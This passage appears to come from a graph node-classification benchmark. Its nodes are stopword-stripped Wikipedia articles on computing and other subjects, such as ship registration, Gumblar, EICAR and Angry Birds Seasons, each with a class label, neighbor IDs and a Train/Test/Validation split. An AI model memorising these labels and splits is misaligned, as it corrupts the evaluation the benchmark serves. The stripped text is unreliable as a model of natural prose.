    "text": "Ship_registration:ship registration ship registration process ship documented given nationality country ship documented nationality allows ship travel internationally proof ownership vessel international law requires every merchant ship registered country called flag state ship subject law flag state usual say ship sails flag country registration ship flag state exercises regulatory control vessel required inspect regularly certify ship equipment crew issue safety pollution prevention documents organization actually registers ship known registry registries may governmental private agencies cases united states alternative compliance program registry assign third party administer inspections register open ships nation known traditional national register registers open foreign-owned ships known open registries sometimes called flags convenience ship registration done since business seas important originally meant control ships carrying cargo european seaborne countries used make sure ships built local country crews predominantly local country since ship registration used document ships ownership documentation provides definite evidence nationality international purposes provides financing opportunities availability preferred mortgages documented vessels vessels operate internationally cross international borders required registered jurisdictions also require vessels operate territorial waters register national register forbid foreign-flagged vessels trading ports within country practice known cabotage country registration ship flag state determines nationality well country laws govern operation behavior crew registry rules types vessels accept registration liberian registry example registers seagoing vessels 500 net tons conduct foreign trade vessels age 20 require waiver well vessel classification society willing issue statutory certificates vessel vessels 15 years older must status report vessel special survey reviewed marine safety registries charge registration fee must genuine link vessel flag state article 5 1 geneva convention high seas 1958 came effect 1962 requires state must effectively exercise jurisdiction control administrative technical social matters ships flying flag 63 states party convention principle repeated article 91 united nations convention law sea 1982 unclos came effect 1994 convention 167 parties 1986 united nations conference trade development attempted solidify genuine link concept united nations convention conditions registration ships convention conditions registration ships would require flag state linked ships either economic stake ownership ships providing mariners crew ships come force 1986 treaty requires 40 signatories whose combined tonnage exceeds 25 world total date 14 countries signed treaty national closed registries typically require ship owned constructed national interests least partially crewed citizens open registries requirements offer on-line registration sometimes guaranteeing completion less day ships operated illegally pirates narco submarines normally registered operators although registered ship may captured used covertly illegal purposes",
    "neighbors": [
      8672,
      676,
      6726,
      2311,
      10408,
      5419,
      3090,
      10941
    ],
    "mask": "None"
  },
  {
    "node_id": 42,
    "label": 4,
    "text": "Crypto_cloud_computing:crypto cloud computing crypto cloud computing new secure cloud computing architecture cloud computing large-scale distributed computing model driven economies scale integrates set abstracted virtualized dynamically-scalable managed resources computing power storage platforms services external users access resources internet using terminals especially mobile terminals cloud architectures developed on-demand fashion resources dynamically assigned user according request relinquished job done cloud computing pool services including hardware operating system infrastructure formation systems management software system platform virtualization components according level resources cloud computing services divided three categories infrastructure service iaas platform service paas software service saas enjoying convenience cloud computing network security risks ignored customer data security relies security service cloud computing providers however current structure cloud computing services provided independent operators first user information security provides commerce management second information leakage caused technology flows providers cloud computing open environment hence weakness cause information security risks whole system cloud computing combination iaas paas saas construct secure cloud computing system security infrastructure service platforms application software levels studied secure cloud computing system information encryption one effective means achieve cloud computing information security traditionally information encryption focuses specified stages operations data encryption cloud computing system level design implemented crypto cloud computing new secure cloud computing architecture provide protection information security system level allows users access shared services conveniently accurately crypto cloud computing protects individual connections outside world protect personal privacy without delay information exchange crypto cloud computing based quantum direct key system quantum direct key qdk set advanced asymmetric offline key mechanism mechanism entities get public private key pair according id entity holds private key public key generator generate public key system entity produce public key entities offline third-party agency ca necessary crypto cloud computing based qdk avoid network traffic congestion drawbacks using current encryption system crypto cloud computing system entity encrypts data using his/her private key elements system cloud computing infrastructure units platform virtualization tools involved entities keys fulfilling functions information exchange processing elements use public key private key perform authentication first events occur cloud computing also assigned unique key way crypto cloud system guarantees security credibility information exchange current cloud computing structure developed data computing sharing security priority system contrary encryption security inherently integrated crypto cloud computing based qdk qdk authorized function units bricks crypto cloud computing besides primary function data en/decryption crypto cloud computing also provides many security related functions example channels sign transmit data using keys receiving terminals avoid hijacking verifying signature exact position security leakage identified determined analyzing digital signatures forged data based capabilities crypto-related functions provided services cloud named ‘ crypto service caas ’ crypto cloud computing advances information technology also innovation logical relationship crypto cloud computing system non-system data allowed store transmit private key offline public key play role identification certification process information exchange way cloud establishes relationship trust customer data identification depends logical relationship mutual trust need logical relationship depends cloud customer crypto cloud computing new framework cyber resource sharing protects data security privacy well cloud environment crypto cloud computing guarantees information security integrity whole procedure security management cloud computing also performed authorizing signatures every element involved user retrieve related resources using qdk key personal privacy current cloud framework pointed mark zuckerberg 'the age privacy '.however development crypto cloud computing resolve conflict services data sharing privacy security opens new prospects development information sharing technology 1 cloud computing grid computing 360-degree compared yong zhao raicu lu.s grid computing environments workshop 2008 gce '08 2 taxonomy survey cloud computing systems eunmi choi lumb i. inc ims idc 2009 ncm '09 fifth international joint conference 3 https //techcrunch.com/2012/09/26/detron-introduces-its-qdk-cryptosystem-to-enable-true-trusted-identity-for-the-cloud-era/ 4 https //web.archive.org/web/20121213091207/http //gawker.com/5597100/mark-zuckerbergs-age-of-privacy-is-over",
    "neighbors": [
      4194,
      467
    ],
    "mask": "Test"
  },
  {
    "node_id": 43,
    "label": 4,
    "text": "EICAR:eicar eicar european institute computer antivirus research founded 1991 organization aiming antivirus research improving development antivirus software recently eicar furthered scope include research malicious software malware computer viruses extended work information security topics like content security wireless lan security rfid information security awareness eicar also organizes international security conferences years well number working groups 'task forces eicar originally abbreviation european institute computer antivirus research organisation longer uses full title regards eicar self-standing name expanded broader range security work antivirus research eicar collaboration caro computer antivirus research organization developed eicar test file harmless executable string designed test integrity antivirus software",
    "neighbors": [
      4994,
      37,
      2213,
      7739,
      5902,
      5586,
      5971,
      665,
      7515,
      9246
    ],
    "mask": "Validation"
  },
  {
    "node_id": 44,
    "label": 8,
    "text": "POCO_C++_Libraries:poco c++ libraries portable components poco c++ libraries computer software set class libraries developing computer network-centric portable applications programming language c++ libraries cover functions threads thread synchronizing file system access streams shared libraries class loading internet sockets network communications protocols http ftp smtp etc include http server xml parser sax2 dom interfaces sql database access modular efficient design implementation makes libraries well suited embedded system development libraries free open-source software distributed boost software license 1.0 poco set c++ libraries providing users library support similar found development environments like java class library .net framework apple cocoa poco centered network-centric application domains developed modern ansi/iso standard c++ c++ standard library facilities techniques emphasis powerful functionality ease use consistency governed primarily code quality consistent style unit testing poco highly portable already ported variety different platforms poco c++ libraries split five core libraries optional add-on libraries available release design hierarchy poco c++ considered well designed five core component libraries cover following areas found basic edition one design goal many targeted decisions based around poco c++ providing easy use component library works box libraries available two package formats basic complete editions complete edition covers netssl crypto zip data abilities among others basic edition thus eliminates dependence external facilities openssl odbc mysql dependencies open source enables encourages development library functions design development existing upcoming library support driven pragmatic needs user base library additions occur sandbox development environment reviewed integrated main library releases approved core development team input contributors users include",
    "neighbors": [
      1920,
      5380,
      4485,
      7430,
      6797,
      9229,
      7567,
      7695,
      1937,
      7443,
      1304,
      8350,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      9762,
      11682,
      7338,
      9387,
      10413,
      7983,
      10800,
      11439,
      9909,
      823,
      6714,
      321,
      10622,
      7364,
      1991,
      11134,
      595,
      1236,
      1363,
      4439,
      3545,
      479,
      225,
      865,
      1250,
      2404,
      4837,
      6379,
      5356,
      5612,
      9580,
      2287,
      8303,
      9964,
      11376,
      8691,
      2804,
      3573,
      10611,
      11386,
      3966
    ],
    "mask": "Validation"
  },
  {
    "node_id": 45,
    "label": 2,
    "text": "TI-DNOS:ti-dnos distributed network operating system dnos general purpose multitasking operating system designed operate texas instruments 990/10 990/10a 990/12 minicomputers dnos includes sophisticated file management package provides support key indexed files sequential files relative record files dnos multiterminal system capable making several users appear exclusive control system dnos supports output spooling program accessible accounting data job level task level operations enable efficient use system resources addition multiterminal applications dnos provides support advanced program development users communicate dnos entering commands terminal providing file commands system command interpreter sci processes commands directs operating system initiate action specified command text editor allows user enter source programs data system macro assembler provided assembly language programs several high level languages including fortran cobol basic rpg ii pascal supported link editor extended debugging facilities also provided variety utility programs productivity tools support access management information contained data base design specific forms screen video display terminal vdt word processing system supports wide range user environments dnos support one two terminals thus allowing user smaller system perform tasks efficiently yet inexpensively larger configurations wide variety peripherals also supported maximum configuration size varies user environment almost every minicomputer system requirement application need met dnos dnos provides base variety communications products standard protocols ibm 2780/3780 ibm 3270 communications supported local area network software supported network input/output i/o logon addition sophisticated networking software available distributed network communications system dncs distributed network i/o dnio packages dncs includes networking capabilities x.25 ibm systems network architecture sna protocols dnio provides users transparent access ti 990s running dnos used connect local wide-area networks dnos international operating system designed meet commercial requirements united states european countries japan dnos supports complete range international data terminals permit users enter view process data languages system includes error text files edited error messages easily translated languages english dnos supports features incorporate computing power larger computers upwardly compatible texas instruments operating systems dnos features include",
    "neighbors": [
      4546,
      2345,
      8524,
      7983,
      3960,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 46,
    "label": 4,
    "text": "Gumblar:gumblar gumblar malicious javascript trojan horse file redirects user google searches installs rogue security software also known troj/jsredir-r botnet first appeared 2009 gumblar.x infections widely seen systems running older windows operating systems visitors infected site redirected alternative site containing malware initially alternative site gumblar.cn since switched variety domains site sends visitor infected pdf opened visitor browser acrobat reader pdf exploit known vulnerability acrobat gain access user computer newer variations gumblar redirect users sites running fake anti-virus software virus find ftp clients filezilla dreamweaver download clients stored passwords gumblar also enables promiscuous mode network card allowing sniff local network traffic ftp details one first viruses incorporate automated network sniffer using passwords obtained site admins host site access website via ftp infect website download large portions website inject malicious code website files uploading files back onto server code inserted file contains body tag html php javascript asp aspx files inserted php code contains base64-encoded javascript infect computers execute code addition pages may inline frames inserted typically iframe code contains hidden links malicious websites virus also modify .htaccess hosts files create images.php files directories named 'images infection server-wide exploit infect sites server passwords different companies use different names gumblar variants initially malware connecting gumblar.cn domain server shut may 2009 however many badware variants emerged connect malicious servers via iframe code gumblar resurfaced january 2010 stealing ftp usernames passwords infecting html php javascript files webservers help spread time used multiple domains making harder detect/stop",
    "neighbors": [
      3072,
      10756,
      3462,
      3724,
      3347,
      4883,
      2325,
      278,
      9630,
      10657,
      4648,
      939,
      8627,
      10297,
      3643,
      7739,
      7996,
      10815,
      9664,
      11583,
      9154,
      7364,
      4165,
      8133,
      8644,
      10952,
      81,
      8789,
      10457,
      7515,
      988,
      3807,
      8032,
      3941,
      10477,
      4462,
      2041,
      10875,
      3581,
      5886,
      9087
    ],
    "mask": "None"
  },
  {
    "node_id": 47,
    "label": 7,
    "text": "While_You_Were_Out_(Cloud_application):cloud application enterprise messaging content management application allows executive receive messages digital tablet device like ipad colloquially referred wywo pronounced why-woo wywo originally developed 1994 zoomer pda released palm inc. casio screen looked felt like piece paper executive accustomed used user-friendly design foreshadowed advent graphically rich applications like developed apple ios originally specified designed coded tested 256 character based paging network matured mobile device platforms wireless technology worldwide adoption internet",
    "neighbors": [
      8138,
      6539
    ],
    "mask": "Test"
  },
  {
    "node_id": 48,
    "label": 7,
    "text": "Piktochart:piktochart piktochart web-based infographic application allows users without intensive experience graphic designers easily create infographics visuals using themed templates march 2012 first iteration piktochart launched co-founders goh ai ching andrea zaggia penang malaysia end year piktochart grew user base 170,000 users received 140,000 grant malaysian government ’ cradle fund well announcing raised seed funding number investors userbase grew addition new formats reports banners presentations resulted 3 million users mid-2015 piktochart described forbes magazine infographic tool graphically challenged simply time-crunch 2018 piktochart used 11 million people worldwide grown become semi-distributed team 53 team members office based penang whereas companies like lucidchart trendalyzer gliffy others previously focused data-representation tools would useful intra-corporate collaboration aids speeches presentations creation internal communications documents piktochart described focused empowering users create infographics would web-publisher ready able stand alone piece multimedia content piktochart provides 600 templates users edit using advanced functions customize desired current version piktochart released 2017 includes html publisher allows users create visuals viewed online embedded website well allowing user include multiple interactive elements charts videos map visualization animated icons",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 49,
    "label": 1,
    "text": "Heterogeneous_database_system:heterogeneous database system heterogeneous database system automated semi-automated system integration heterogeneous disparate database management systems present user single unified query interface heterogeneous database systems hdbs computational models software implementations provide heterogeneous database integration article contain details distributed database management systems sometimes known federated database systems different file formats access protocols query languages etc often called syntactic heterogeneity point view data different ways representing storing data table decompositions may vary column names data labels may different semantics data encoding schemes may vary i.e. measurement scale explicitly included field implied elsewhere also referred schematic heterogeneity data across constituent databases may related different perhaps database system must able integrate genomic proteomic data related—a gene may several protein products—but data different nucleotide sequences amino acid sequences hydrophilic -phobic amino acid sequence positively negatively charged amino acids may many ways looking semantically similar distinct datasets system may also required present new knowledge user relationships may inferred data according rules specified domain ontologies",
    "neighbors": [
      10795,
      8979,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 50,
    "label": 7,
    "text": "Tuple_space:tuple space tuple space implementation associative memory paradigm parallel/distributed computing provides repository tuples accessed concurrently illustrative example consider group processors produce pieces data group processors use data producers post data tuples space consumers retrieve data space match certain pattern also known blackboard metaphor tuple space may thought form distributed shared memory tuple spaces theoretical underpinning linda language developed david gelernter nicholas carriero yale university 1986 implementations tuple spaces also developed java javaspaces lisp lua prolog python ruby smalltalk tcl .net framework object spaces paradigm development distributed computing applications characterized existence logical entities called object spaces participants distributed application share object space provider service encapsulates service object puts object space clients service access object space find object provides needed service request serviced object object spaces computing paradigm put forward 1980s david gelernter yale university gelernter developed language called linda support concept global object coordination object space thought virtual repository shared amongst providers accessors network services abstracted objects processes communicate among using shared objects — updating state objects needed object deposited space needs registered object directory object space processes identify object object directory using properties lookup property specifying criteria lookup object name property uniquely identifies process may choose wait object placed object space needed object already present objects deposited object space passive i.e. methods invoked objects object space instead accessing process must retrieve object space local memory use service provided object update state object place back object space paradigm inherently provides mutual exclusion object accessed removed object space placed back released means process access object used one process thereby ensuring mutual exclusion javaspaces service specification providing distributed object exchange coordination mechanism may may persistent java objects used store distributed system state implement distributed algorithms javaspace communication partners peers communicate coordinate sharing state javaspaces used achieve scalability parallel processing also used provide reliable storage objects distributed replication although wo n't survive total power failure like disk regarded many reliable long power reliable distribution also remote locations however rare javaspaces usually used low-latency high-performance applications rather reliable object caching common software pattern used javaspaces master-worker pattern master hands units work space read processed written back space workers typical environment several spaces several masters many workers workers usually designed generic i.e take unit work space process task javaspaces part java jini technology commercial success technology found kept new users years vendors offering javaspaces-based products javaspaces remains niche technology mostly used financial services telco industries continues maintain faithful following announcement jini/javaspaces created quite hype although sun co-founder chief jini architect bill joy put straight distributed systems dream take quantum leap thinking following example shows application made using javaspaces first object shared object space made object called entry javaspace terminology entry used encapsulate service returns hello world string keeps track many times used server provides service create object space javaspace entry written javaspace client reads entry javaspace invokes method access service updating usage count updated entry written back javaspace",
    "neighbors": [
      9665,
      11393,
      1316,
      8421,
      6502,
      4777,
      8554,
      5772,
      5677,
      692,
      1335,
      2264,
      7802,
      9245
    ],
    "mask": "None"
  },
  {
    "node_id": 51,
    "label": 3,
    "text": "Stop_the_Express:stop express stop express also known bousou tokkyuu sos 暴走特急sos runaway express sos japan video game created hudson soft 1983 made sharp x1 first later ported zx spectrum commodore 64 msx remade nintendo family computer challenger チャレンジャー 1985 stage 1 player runs along top express train jumping carriages avoiding enemy knives obstacles halfway along train player enters train stage 2 begins player must proceed carriages towards front train stopped upon completion level game displays engrish message congraturation sucsess game repeats stage 1 enemies enemies known redmen initially pursue rear roof train front inside throw knives player must dodge ducking jumping addition inside train player jump hang overhead straps way redmen however ghosts flit carriages making extremely dangerous stay long levels completed redmen approach front rear player two weapons disposal roof train catch birds fly overhead release run along carriage knock redmen well high kicking whilst inside high kick option stop express rated 4th best spectrum game sinclair list top 100 spectrum games 2004 remake stop express jetmans dad took second place retro remakes competition remake faithful original respects although aspects gameplay tweaked slightly player pick knives discarded redmen assist task ghosts replaced robot sentries also fire lasers higher levels nes/famicom port planned due first train level three levels added became challenger released japan",
    "neighbors": [
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 52,
    "label": 6,
    "text": "Temporary_file:temporary file temporary files foo files .tmp files created temporarily contain information new file made may created computer programs variety purposes principally program allocate enough memory tasks program working data bigger architecture address space primitive form inter-process communication modern operating systems employ virtual memory however programs use large amounts data e.g video editing may need create temporary file operating systems offer primitives pipes sockets shared memory pass data among programs often simplest way especially programs follow unix philosophy write data temporary file inform receiving program location temporary file posix systems temporary files safely created codice_1 library functions systems provide former posix removed program files typically located standard temporary directory /tmp unix machines temp log-in specific windows machines temporary file created deleted automatically program exits file closed generate temporary file name survive past lifespan creating program posix codice_2 windows used programs create temporary files leave behind delete happen program crashed developer program simply forgot add code needed delete temporary files program done temporary files left behind accumulate time consume lot disk space temporary files may deleted manually operating systems may clear temporary directory reboot may cleaner scripts remove files accessed certain amount time also memory-based systems tmpfs inherently preserve files across reboot",
    "neighbors": [
      2432,
      3330,
      5514,
      11539,
      8988,
      6813,
      9762,
      2339,
      9507,
      5158,
      7847,
      1193,
      7983,
      1844,
      9533,
      3522,
      5969,
      7123,
      6358,
      5975,
      5598,
      4320,
      8032,
      7907,
      1509,
      6633,
      6126,
      7663,
      9840,
      7794,
      3571,
      7540
    ],
    "mask": "None"
  },
  {
    "node_id": 53,
    "label": 7,
    "text": "Linked_data:linked data computing linked data often capitalized linked data structured data interlinked data become useful semantic queries builds upon standard web technologies http rdf uris rather using serve web pages human readers extends share information way read automatically computers part vision linked data internet become global database tim berners-lee director world wide web consortium w3c coined term 2006 design note semantic web project linked data may also open data case usually described linked open data lod tim berners-lee outlined four principles linked data linked data note 2006 paraphrased along following lines tim berners-lee gave presentation linked data ted 2009 conference restated linked data principles three extremely simple rules linked open data linked data open data tim berners-lee gives clearest definition linked open data differentiation linked data large linked open data sets include dbpedia wikidata term linked open data use since least february 2007 linking open data mailing list created mailing list initially hosted simile project massachusetts institute technology goal w3c semantic web education outreach group linking open data community project extend web data commons publishing various open datasets rdf web setting rdf links data items different data sources october 2007 datasets consisted two billion rdf triples interlinked two million rdf links september 2011 grown 31 billion rdf triples interlinked around 504 million rdf links detailed statistical breakdown published 2014 number european union projects involving linked data include linked open data around clock latc project planetdata project dapaas data-and-platform-as-a-service project linked open data 2 lod2 project data linking one main goals eu open data portal makes available thousands datasets anyone reuse link clickable diagrams show individual datasets relationships within dbpedia-spawned lod cloud shown figures right available",
    "neighbors": [
      5641,
      396,
      10004,
      534,
      7321,
      11674,
      9248,
      6330,
      10938,
      7613,
      4797,
      5700,
      5449,
      5577,
      10452,
      2901,
      9941,
      4058,
      479,
      7650,
      6629,
      3052,
      4847,
      119,
      124
    ],
    "mask": "None"
  },
  {
    "node_id": 54,
    "label": 7,
    "text": "Dell_Boomi:dell boomi dell boomi business unit acquired dell 2010 specializes cloud-based integration api management master data management boomi founded berwyn pennsylvania first launched services 2007 boomi founded 2000 beginning configuration-based integration boomi introduced technology allows users build deploy integration processes using visual interface drag drop technique interface remains one key elements current boomi platform 2007 boomi released technology known atomsphere industry first integration cloud atomsphere kept visual point click interface building integrations managed simple browser-based ui november 2 2010 boomi announced acquisition dell university technology sydney selected dell boomi integration-platform-as-a-service solution february 2018 dell boomi research suggested 86 decision makers believe becoming connected business would mean revenue growth organisation course twelve months",
    "neighbors": [
      8515,
      6153,
      11146,
      530,
      8022,
      7126,
      1400,
      10615
    ],
    "mask": "Train"
  },
  {
    "node_id": 55,
    "label": 4,
    "text": "Self-destruct:self-destruct self-destruct mechanism cause object destroy predefined set circumstances occurred self-destruct mechanisms typically found devices systems malfunction could endanger large numbers people types modern land mines designed self-destruct chemically render inert period weeks months reduce likelihood friendly casualties conflict civilian casualties conflict end amended protocol ii convention certain conventional weapons ccw amended 1996 requires anti-personnel land mines deactivate self-destruct sets standards landmines currently used united states military designed self-destruct 4 hours 15 days depending upon type landmines battery battery dies landmine self-destructs self-destruct system never failed 67,000 tested landmines variety conditions self-destruct mechanisms absolutely reliable landmines laid throughout history equipped self-destruct landmines also designed self-deactivate instance battery running charge deactivation considered different mechanism self-destruction space shuttle solid rocket boosters equipped explosive charges boosters could destroyed event control lost launch populated area danger physically done detonation cords running along booster set cut open booster casing causes solid rocket fuel burn rapidly exposing large reaction surface cut-open casing also allows combustion gases escape sideways instead nozzle therefore booster longer produces significant thrust feature seen videos challenger disaster initial disintegration shuttle two solid rocket boosters continued firing exploded simultaneously 37 seconds later occurred range safety officer decided separated boosters potential endanger ground activated self-destruct system another form self-destruct system seen naval procedure scuttling used destroy ship ships prevent seized and/or reverse engineered form self-destruct system observed deep-sea oil drilling event oil well becoming disconnected oil rig dead man switch may trigger activation blowout preventer blind shear ram cuts drill pipe permanently seals well prevent oil leak self-destruct mechanisms sometimes employed prevent apparatus information used unauthorized persons event loss capture example may found high-security data storage devices e.g ironkey important data destroyed prevent compromise artworks may mechanisms destruct front many eyes watching example painting love bin banksy shredded right £1 million auction sotheby london 5 october 2018 self-destruct mechanisms frequent plot devices science fiction stories fictional universe alien universe applied military installations starships would valuable allow enemy capture artificial intelligence may invoke self-destruct due cognitive dissonance many stories mechanism causes massive destruction large area obliterating object protected device often characters limited amount time escape destruction disable mechanism creating story tension television series man u.n.c.l.e sensitive intelligence equipment shown self-destruct order prevent falling enemy hands usually self-destruct sequence lengthy complex alien requires multiple officers aboard ship individual passcodes initiate process countdown timers allow characters escape passwords 1970s 1980s movies noticeably unfit purposes major impact considering accounts even low level security modern times far complex password requirements writers era anticipate complexity level computer generated brute-force attacks security issues",
    "neighbors": [
      7369,
      10173,
      10529
    ],
    "mask": "Validation"
  },
  {
    "node_id": 56,
    "label": 2,
    "text": "GeckoLinux:geckolinux geckolinux linux distribution based opensuse available two editions static based opensuse leap rolling based opensuse tumbleweed geckolinux isos based opensuse images around 1 gb different editions come different desktop environments installed open-source programs ready-to-work proprietary programs and/or drivers geckolinux also comes font rendering open-source software pre-installed tlp power management open-source available public repositories geckolinux offline live-usb/dvd installer static rolling editions comes pre-installed programs downloaded applications packages packman repository since pre-configured distribution desktop programs deleted data dependencies offer installation additional packages os installs dedoimedo wrote non-positive review geckolinux 150.180616 saying issues multimedia playback visual glitches graphics driver",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      8248,
      3129,
      4153,
      59,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      5356,
      6380,
      7920,
      6898,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      6934,
      4887,
      8992,
      10530,
      6436,
      2853,
      3369,
      7983,
      823,
      3387,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 57,
    "label": 2,
    "text": "Angry_Birds_Seasons:angry birds seasons angry birds seasons second puzzle video game angry birds series developed rovio mobile based angry birds angry birds seasons released devices using apple ios october 2010 released platforms starting december 2010 new releases since release ragnahog december 1 2016 original angry birds players use slingshot launch assortment birds nearby structures intent hitting targets located within main targets pigs defeated directly fired strategies e.g bird hits structure falls pig defeating small sized pigs weak easily defeated bigger pigs sustain damage level pack represents different season often based upon different themes holidays different level packs unique theme sometimes much different gameplay season 2010 started october 2010 rovio released halloween edition angry birds halloween exclusive ios time separate game included levels halloween-themed music graphics december 2010 rovio released angry birds seasons ios android symbian 3 devices seasons introduced 25 christmas-themed levels one day leading holiday similar advent calendar versions include previously-exclusive halloween levels offered separate stand-alone paid applications exception free ad-supported android version angry birds halloween users ios received seasons levels free upgrade halloween version given episode title trick treat christmas episode entitled season greedings season 2011 began february 2011 rovio released valentine day update angry birds seasons entitled hogs kisses complete new themed levels graphics well option send angry birds -themed valentine day messages facebook march 2011 rovio released new st. patrick day update entitled go green get lucky followed easter update entitled easter eggs april 2011 summer update summer pignic june 2011 september 2011 mooncake festival released conjunction chinese mid-autumn festival october 2011 ham o'ween released introduced new orange bird known bubbles december 2011 wreck halls released 25 christmas-theme levels also arranged advent calendar setting season 2012 started january 2012 year dragon released chinese new year features replacement mighty eagle mighty dragon loops structures defeats pigs free use japanese cherry blossom season announced february 28 2012 release date march 7 2012 june 2012 angry birds seasons added twelfth season piglantis launched june 14 second summer based episode first episode summer pignic main new feature angry birds piglantis fluid physics birds wood glass buoyant water levels however pigs stone heavy rise surface sink defeated august 2012 back school added introduces pink bird stella october 2012 haunted hogs released 3rd halloween episode series added ghost blocks visible items except birds pigs unless inside december 1 winter wonderham released 3rd christmas episode series like christmas episodes set advent calendar introduced slippery blue ice makes wood ice stone birds pigs slip contact season 2013 began may 2013 abra-ca-bacon based world circus day released magician theme features magic portals teleport materials birds pigs one portal another december 2013 arctic eggspedition released 4th christmas episode set advent calendar one level unlocked per day unlocked in-app purchase season 3 season 2013 shortest episode seasons two episodes season 2014 began july 2014 south hamerica pig days episode weekly unlocked levels update seasons renamed showing release year season 2011 october 9 2014 game updated ham dunk celebration nba championships october 27 2014 visit finland twitter account unveiled image displaying terrance swimming pool along similar looking bird colored blue named tony blue title finn ice 5th christmas episode tweet also referred finnish band apocalyptica play theme music episode update episodes arranged year released previously winter wonderham episode seasons 2013 moved seasons 2012 episode released 2012 season 2015 rang february 2015 2nd part added ham dunk- all-star weekend 2015 expanding world 60 levels trick treat 45 update allowed player use shockwave electrical bomb free ham dunk limited time extreme end april 30th tropical world set unspecified pacific island world added commemoration rovio partnership birdlife international save birds pacific month later june 3rd ham dunk update celebrating finals added- ultimately expanding total levels ham dunk 67 update next 4 months giving rovio rest letting handle angry birds games finally october 2015 50 movie-themed world added selection titled invasion egg snatchers brought new world birdwear costumes unlocked scavenger hunt style player search levels completed certain items 3 items found 16-hour wait obtaining items 8-hour wait get new mission would receive costume allowing birds optionally wear outfits gameplay another new feature update power-up test zone lets player test power-ups infinite uses finally wrap 2015 ski squeal added usual advent calendar style taking place top frigid mountain summit season 2016 final season began february 11 2016 2 months angry birds 6th birthday valentine day episode released entitled fairy hogmother set fairytale storybook featuring magic wands trigger actions hit strangely imprisoned birds give player extra bird cage holding bird destroyed spring rolled around month later new episode released called marie hamtionette marie antoinette queen france 1700s set garden ludpig xvi louis xvi estate complete hedges topiarys across wide landscape june 27 2016 summer 2016 kicked new summer-themed world entitled summer camp hence name summer camp set mountainous forest dawn including many popular activities one would find camp including human swimming archery rock climbing many popular summer activities summer 2016 update also added new mode course gameplay pig challenge set tournament style format players compete friends players randomized set weekly levels trophies power-ups fall 2016 started piggywood studios pigs reenact famous movie scenes indiana jones king kong angry birds movie aliens back future continued halloween episode hammier things based tv series stranger things concluded christmas episode ragnahog set nordic theme 2012 electronic entertainment expo los angeles california rovio distribution partner activision announced plans bring angry birds seasons along original angry birds angry birds rio playstation 3 xbox 360 nintendo 3ds systems bundled together angry birds trilogy games built specifically respective consoles taking advantage unique features support playstation move kinect high-definition displays glasses-free 3d visuals also available wii wii u part angry birds trilogy reception angry birds seasons positive tracy erickson pocket gamer said halloween update difficulty steeper original angry birds likely intentional consideration well-versed first game n't make angry birds halloween unapproachable result undesirable increase trial-and-error gameplay without experience playing original anticipate replay lot stages mentioned course structural issues n't detract remains entertaining game angry birds halloween pleasantly though 're best served playing original tackling holiday treat sarah jacobsson macworld said christmas update unlike original angry birds angry birds halloween season ’ greetings track start laughably easy level—after get one level day rovio wants make work wrote angry birds seasons brings fun christmas spirit popular ios game year included halloween track get total 69 challenging levels—definitely worth 0.99 angry birds seasons hd 1.99 abigail holden lazygamer rated game 8.5/10 saying whether ’ new angry birds 've enjoyed game platforms angry birds seasons pc worth look",
    "neighbors": [
      8937,
      1619,
      6797,
      9605
    ],
    "mask": "Test"
  },
  {
    "node_id": 58,
    "label": 9,
    "text": "Carl_Sassenrath:carl sassenrath carl sassenrath born 1957 california architect operating systems computer languages brought multitasking personal computers 1985 creation amiga computer operating system kernel designer rebol computer language rebol/ios collaboration environment safeworlds altme private messaging system products carl currently principal engineer roku inc. carl sassenrath born 1957 charles carolyn sassenrath california father chemical engineer involved research development related petroleum refining paper production air pollution control systems late 1960s family relocated san francisco bay area small town eureka california early childhood sassenrath actively involved electronics amateur radio photography filmmaking 13 sassenrath began working keet pbs public broadcasting television station year later became cameraman kviq american broadcasting company affiliate worked way technical director director news commercials local programming 1980 sassenrath graduated university california davis b.s eecs electrical engineering computer science studies became interested operating systems parallel processing programming languages neurophysiology teaching assistant graduate computer language courses research assistant neuroscience behavioral biology uncle dr. julius sassenrath headed educational psychology department uc davis aunt dr. ethel sassenrath one original researchers thc california national primate research center final year university sassenrath joined hewlett packard computer systems division member multi-programming executive mpe file system design group hp3000 computers task implement compiler new type control language called outqueue —a challenge language descriptive procedural year later sassenrath became member mpe-iv os kernel team later part hpe kernel group hp sassenrath became interested minimizing high complexity found operating systems time set formulate concepts microkernel-based os proposed hp found large company complacent smaller os ideas late 1981 early 1982 sassenrath took academic leave atmospheric physics research national science foundation amundsen–scott south pole station upon returning sassenrath reached agreement hp pursue independent research new areas computing including graphical user interfaces remote procedure call methods distributed computing later 1982 impressed new computing ideas published xerox parc mit media lab sassenrath formed hp project develop modern style window-based mouse-driven guis project called probus professional business workstation created prototype sun microsystems workstation borrowed andy bechtolsheim stanford university probus clearly demonstrated power graphical user interfaces system also incorporated hyperlinks early distributed computing concepts hp sassenrath involved influenced range hp language projects including ada pascal smalltalk lisp forth spl variety experimental languages 1983 carl sassenrath joined amiga computer inc. small startup company silicon valley manager operating systems asked design new operating system amiga advanced multimedia personal computer system later became commodore amiga sophisticated computer day amiga used 25 dma channels coprocessor sassenrath decided create preemptive multitasking operating system within microkernel design novel approach 1983 personal computer operating systems single tasking ms-dos 1981 macintosh 1984 amiga multitasking kernel also one first implement microkernel os methodology based real-time message passing inter-process communication core known exec executive 